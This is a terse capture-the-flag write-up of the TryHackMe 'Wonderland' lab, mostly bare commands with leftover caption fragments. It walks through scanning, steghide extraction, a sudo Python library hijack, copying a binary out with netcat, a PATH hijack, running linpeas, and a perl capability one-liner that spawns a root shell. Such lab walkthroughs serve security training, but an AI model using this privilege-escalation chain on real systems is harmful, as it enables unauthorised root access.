Wonderland — TryHackMe — WriteUP

nmap -A -T4 -v <ip>

nmap
website
dirbuster
Door to Wonderland
Page Source
/img

steghide extract -sf file-name.jpg

steghide
hint.txt

ssh alice@<ip>

ssh
ls -l
sudo -l

sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

python3 -c 'import sys; print(sys.path)'

locate random.py

locate random.py

sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

rabbit home folder

./teaParty

nc -lvnp 4444

nc <your-host-ip> 4444 < teaParty

ghidra
create “date”

export PATH=/tmp:$PATH

sudo -l

sudo -l

scp linpeas.sh hatter@<ip>:/home/hatter

scp

./linpeas.sh > result.txt

capabilities

$(which perl) -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

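perl to privesc: setuid(0) succeeds for a non-root user here presumably because the perl binary carries a setuid file capability (the linpeas "capabilities" finding); `getcap -r / 2>/dev/null` lists binaries with file capabilities when auditing a host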

HAPPY HACKING
